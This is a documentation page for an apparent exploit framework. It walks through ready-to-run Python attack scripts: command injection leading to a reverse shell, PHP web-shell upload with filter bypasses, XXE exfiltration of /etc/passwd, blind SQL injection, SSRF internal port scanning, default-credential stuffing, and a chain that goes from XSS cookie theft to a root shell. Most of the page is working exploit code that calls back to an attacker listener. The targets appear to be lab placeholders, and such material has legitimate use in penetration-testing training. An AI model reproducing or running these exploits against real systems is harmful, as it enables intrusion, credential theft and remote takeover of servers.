Workflows
End-to-end POC workflows for common exploitation scenarios.
RCE to Interactive Shell
From command injection to full PTY shell.
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.reverse_shells import python_oneliner, bash_shell
from your_project.utils.shell_catcher import auto_shell
def run(args):
    """Send a reverse-shell command to the injectable endpoint and hand off to an interactive session.

    Args:
        args: parsed CLI namespace; reads ``target``, ``lhost`` and ``lport``.

    Returns:
        None. The outcome is reported through ``out``.
    """
    target, lhost, lport = args.target, args.lhost, args.lport

    # Connect-back one-liner pointed at our listener.
    cmd = python_oneliner(lhost, lport)
    out.info(f"Payload: {cmd}")

    # The listener (auto_shell) is entered before the request goes out.
    with auto_shell(lport) as catcher:
        out.status("Triggering RCE...")
        # NOTE(review): a ReadTimeout (timeout=5) raised here leaves the
        # ``with`` block before shell_caught is consulted — confirm how
        # auto_shell's __exit__ deals with that.
        requests.post(
            f"{target}/api/run",
            json={"command": cmd},
            timeout=5,
        )

        out.status(f"Waiting for shell on port {lport}...")
        if not catcher.shell_caught:
            out.error("No shell received")
            return
        out.success("Shell caught!")
        catcher.stabilize()  # PTY upgrade
        out.info("Shell stabilized. Entering interactive mode...")
        catcher.interact()
Run:
uv run your_project --target http://target.local --lhost 10.10.14.5 --lport 4444
File Upload to RCE
Upload a malicious file and get a shell.
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.file_upload import FileUploader
from your_project.utils.reverse_shells import php_shell
from your_project.utils.shell_catcher import quick_catch
def run(args):
    """Upload a PHP reverse shell through the upload endpoint, then request it while a listener waits.

    Args:
        args: parsed CLI namespace; reads ``target``, ``lhost`` and ``lport``.

    Returns:
        None. Returns early (after ``out.error``) when the upload response is
        not HTTP 200.
    """
    target, lhost, lport = args.target, args.lhost, args.lport

    # php_shell() hands back a filename that is read from payloads/.
    shell_path = php_shell(lhost, lport)
    out.info(f"Generated shell at: {shell_path}")
    with open(f'payloads/{shell_path}', 'rb') as fh:
        shell_code = fh.read()

    out.status("Uploading shell...")
    uploader = FileUploader(f"{target}/upload")
    result = uploader.upload_with_bypass(
        "shell.php",
        shell_code,
        techniques=["double_extension", "null_byte"],
    )
    if result.status_code != 200:
        out.error("Upload failed")
        return
    out.success("Shell uploaded!")

    def trigger():
        # Passed to quick_catch as trigger_func; presumably invoked once its
        # listener is up — confirm against shell_catcher.
        out.status("Triggering shell execution...")
        requests.get(f"{target}/uploads/shell.php", timeout=2)

    quick_catch(lport, trigger_func=trigger)
Run:
uv run your_project --target http://target.local --lhost 10.10.14.5 --lport 4444
XXE Data Exfiltration
Read files via XXE.
Setup:
Start the HTTP callback server first:
uv run your_project --server
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.xxe import quick_test
from your_project.utils.server_hooks import get_exfil
def run(args):
    """Send an XXE payload that references our callback server and print whatever comes back.

    The callback server (``--server``) must already be running on ``lhost:lport``.

    Args:
        args: parsed CLI namespace; reads ``target``, ``lhost`` and ``lport``.

    Returns:
        The data returned by ``get_exfil``, or ``None`` when nothing arrived
        within 30 seconds.
    """
    target, lhost, lport = args.target, args.lhost, args.lport
    callback = f"http://{lhost}:{lport}"

    # quick_test builds the XML body (and, per the original comment, also
    # creates the DTD file).
    payload = quick_test(callback, "/etc/passwd")
    out.info("XXE payload generated")

    out.status("Sending XXE payload...")
    # NOTE(review): no timeout on this call; an unresponsive parser endpoint
    # blocks here indefinitely.
    requests.post(
        f"{target}/api/parse",
        data=payload,
        headers={"Content-Type": "application/xml"},
    )

    out.status("Waiting for data exfiltration...")
    data = get_exfil(timeout=30)
    if not data:
        out.error("No data received")
        return None

    out.success("Data exfiltrated!")
    rule = "=" * 50
    # NOTE(review): "\\n" as shown is a literal backslash-n, probably meant
    # to be "\n" — confirm against the original source.
    out.raw("\\n" + rule)
    out.raw(data)
    out.raw(rule + "\\n")
    return data
Run:
uv run your_project --target http://target.local --lhost 10.10.14.5
Blind SQL Injection
Extract data via blind SQLi.
Exploit Code:
# src/your_project/exploit.py
import requests
import string
from your_project.utils.output import out
from your_project.utils.timing import time_request
def run(args):
    """Recover the current database name one character at a time with a boolean-based blind SQLi oracle.

    Args:
        args: parsed CLI namespace; reads ``target``.

    Returns:
        The recovered name — at most 32 characters, empty if the first
        position never matched.
    """
    target = args.target
    endpoint = f"{target}/api/user"

    def oracle(condition):
        """Return True when the response body contains "Welcome", i.e. the injected condition held."""
        # NOTE(review): no timeout on this request.
        resp = requests.get(endpoint, params={"id": f"1' AND {condition}--"})
        return "Welcome" in resp.text

    charset = string.ascii_lowercase + string.digits + "_"
    out.info("Extracting database name...")

    db_name = ""
    for pos in range(1, 33):
        # Characters are tried in charset order; the first hit wins.
        hit = next(
            (c for c in charset if oracle(f"SUBSTRING(DATABASE(),{pos},1)='{c}'")),
            None,
        )
        if hit is None:
            break  # nothing matched at this position: treated as end of name
        db_name += hit
        out.status(f"Database: {db_name}")

    out.success(f"Database name: {db_name}")
    return db_name
def run_time_based(args):
    """Recover the database name with a time-based blind SQLi oracle (for when the boolean oracle gives no signal).

    Args:
        args: parsed CLI namespace; reads ``target``.

    Returns:
        The recovered name — at most 32 characters, empty if the first
        position never matched.
    """
    target = args.target
    endpoint = f"{target}/api/user"

    def oracle(pos, char):
        """Return True when the request took more than 3 s, i.e. the SLEEP(3) branch ran."""
        payload = f"1' AND IF(SUBSTRING(DATABASE(),{pos},1)='{char}',SLEEP(3),0)--"

        def send():
            return requests.get(endpoint, params={"id": payload}, timeout=10)

        # time_request returns the elapsed time of send(); the second argument
        # is presumably used for its own reporting — confirm against timing.py.
        return time_request(send, payload) > 3

    charset = string.ascii_lowercase + string.digits + "_"
    out.info("Extracting database name (time-based)...")

    db_name = ""
    for pos in range(1, 33):
        hit = next((c for c in charset if oracle(pos, c)), None)
        if hit is None:
            break  # nothing matched at this position: treated as end of name
        db_name += hit
        out.status(f"Database: {db_name}")

    out.success(f"Database name: {db_name}")
    return db_name
Run:
# Boolean-based
uv run your_project --target http://target.local
# Time-based (if boolean-based doesn't work)
uv run your_project --target http://target.local --time-based
SSRF to Internal Access
Exploit SSRF to access internal services.
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.batch_request import batch_request_sync, generate_param_payloads
import httpx
def run(args):
    """Probe ``/fetch`` for SSRF, then use it to check a fixed list of loopback ports and the admin panel on 8080.

    Args:
        args: parsed CLI namespace; reads ``target``.

    Returns:
        None. Returns early when the initial SSRF probe is not HTTP 200.
    """
    target = args.target
    fetch_url = f"{target}/fetch"

    out.info("Testing SSRF...")
    # NOTE(review): no timeout on this request.
    probe = requests.get(fetch_url, params={"url": "http://127.0.0.1:80"})
    if probe.status_code != 200:
        out.error("SSRF test failed")
        return
    out.success("SSRF confirmed!")

    out.status("Scanning internal ports...")
    # NOTE(review): the Client is never closed; check whether batch_request_sync
    # owns its own transport before wrapping this in ``with``.
    client = httpx.Client()
    template = client.build_request("GET", fetch_url)

    ports = [22, 80, 443, 3306, 5432, 6379, 8080, 9200]
    loopback_urls = [f"http://127.0.0.1:{p}" for p in ports]
    results = batch_request_sync(
        template,
        payloads=generate_param_payloads("url", loopback_urls),
        # "Open" here means the fetch came back 200 with a body over 100 chars.
        validate=lambda r: r.status_code == 200 and len(r.text) > 100,
        concurrency=5,
    )

    out.info("\\nOpen internal ports:")
    for item in results:
        if not item.matched:
            continue
        # The port is the text after the last ':' of the probed URL.
        port = item.payload['params']['url'].rsplit(':', 1)[-1]
        out.success(f"Port {port} is open")

    out.status("\\nTrying internal admin panel...")
    admin = requests.get(fetch_url, params={"url": "http://127.0.0.1:8080/admin"})
    if "admin" in admin.text.lower():
        out.success("Accessed internal admin panel!")
        out.raw(admin.text[:500])
Run:
uv run your_project --target http://target.local
Credential Stuffing
Test multiple credentials efficiently.
Exploit Code:
# src/your_project/exploit.py
import httpx
from your_project.utils.output import out
from your_project.utils.batch_request import batch_request_sync, generate_json_payloads
def run(args):
    """Try a short list of default username/password pairs against ``/api/login`` and print those that return a token.

    Args:
        args: parsed CLI namespace; reads ``target``.

    Returns:
        None. Hits are reported through ``out``.
    """
    target = args.target

    candidates = [
        {"username": "admin", "password": "admin"},
        {"username": "admin", "password": "password"},
        {"username": "admin", "password": "admin123"},
        {"username": "root", "password": "root"},
        {"username": "administrator", "password": "administrator"},
        {"username": "test", "password": "test"},
    ]
    out.info(f"Testing {len(candidates)} credential pairs...")

    # NOTE(review): the Client is never closed; check whether batch_request_sync
    # owns its own transport before wrapping this in ``with``.
    client = httpx.Client()
    template = client.build_request(
        "POST",
        f"{target}/api/login",
        json={"username": "", "password": ""},
    )

    results = batch_request_sync(
        template,
        payloads=[{"json": pair} for pair in candidates],
        # A hit is an HTTP 200 whose body mentions "token".
        validate=lambda r: r.status_code == 200 and "token" in r.text,
        concurrency=3,  # kept low so the login endpoint is not hammered
    )

    for item in results:
        if item.matched:
            pair = item.payload['json']
            out.success(f"Valid creds: {pair['username']}:{pair['password']}")
Run:
uv run your_project --target http://target.local
Complete Exploitation Workflow
Full exploitation chain.
Setup:
Start the HTTP callback server first:
uv run your_project --server
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.html_parser import HTMLParser
from your_project.utils.xss import cookie_stealer
from your_project.utils.server_hooks import get_cookie
from your_project.utils.cookie import parse_cookie_string
from your_project.utils.file_upload import FileUploader
from your_project.utils.reverse_shells import php_shell
from your_project.utils.shell_catcher import auto_shell
def run(args):
    """Run the four-stage chain: recon, XSS cookie theft, authenticated upload, reverse shell.

    Stage 2 needs the callback server (``--server``) on ``lhost:lport``; the
    reverse shell in Stages 3-4 uses port 4444 regardless of ``lport``.

    Args:
        args: parsed CLI namespace; reads ``target``, ``lhost`` and ``lport``.

    Returns:
        None. Each stage returns early after ``out.error`` when its
        precondition is not met.
    """
    target, lhost, lport = args.target, args.lhost, args.lport

    # Stage 1: confirm the landing page exposes an upload form.
    out.info("Stage 1: Reconnaissance")
    # NOTE(review): no timeout on this request.
    landing = requests.get(target)
    forms = HTMLParser.from_response(landing).find_forms()
    out.success(f"Found {len(forms)} forms")

    upload_form = next(
        (f for f in forms if 'upload' in f.get('action', '').lower()),
        None,
    )
    if not upload_form:
        out.error("No upload form found")
        return
    # upload_form is only a gate; the upload below goes to the fixed /upload path.

    # Stage 2: plant a cookie-stealing payload and wait for the callback.
    out.info("\\nStage 2: XSS Cookie Theft")
    payload = cookie_stealer(f"http://{lhost}:{lport}")
    # NOTE(review): no timeout on this request.
    requests.post(f"{target}/comment", data={"msg": payload})
    out.status("Waiting for admin...")
    cookie_str = get_cookie(timeout=60)
    if not cookie_str:
        out.error("No cookie received")
        return
    out.success("Cookie captured!")
    cookies = parse_cookie_string(cookie_str)

    # Stage 3: upload the PHP shell with the captured session cookies.
    out.info("\\nStage 3: File Upload")
    shell_path = php_shell(lhost, 4444)
    with open(f'payloads/{shell_path}', 'rb') as fh:
        shell_code = fh.read()
    result = FileUploader(f"{target}/upload").upload(
        "shell.php",
        shell_code,
        cookies=cookies,
    )
    if result.status_code != 200:
        out.error("Upload failed")
        return
    out.success("Shell uploaded!")

    # Stage 4: request the uploaded file while listening on 4444.
    out.info("\\nStage 4: Shell Execution")
    with auto_shell(4444) as catcher:
        requests.get(f"{target}/uploads/shell.php", timeout=2)
        if catcher.shell_caught:
            # NOTE(review): the message claims root, but nothing here checks
            # which user the shell runs as.
            out.success("Root access achieved!")
            catcher.stabilize()
            catcher.interact()
Run:
uv run your_project --target http://target.local --lhost 10.10.14.5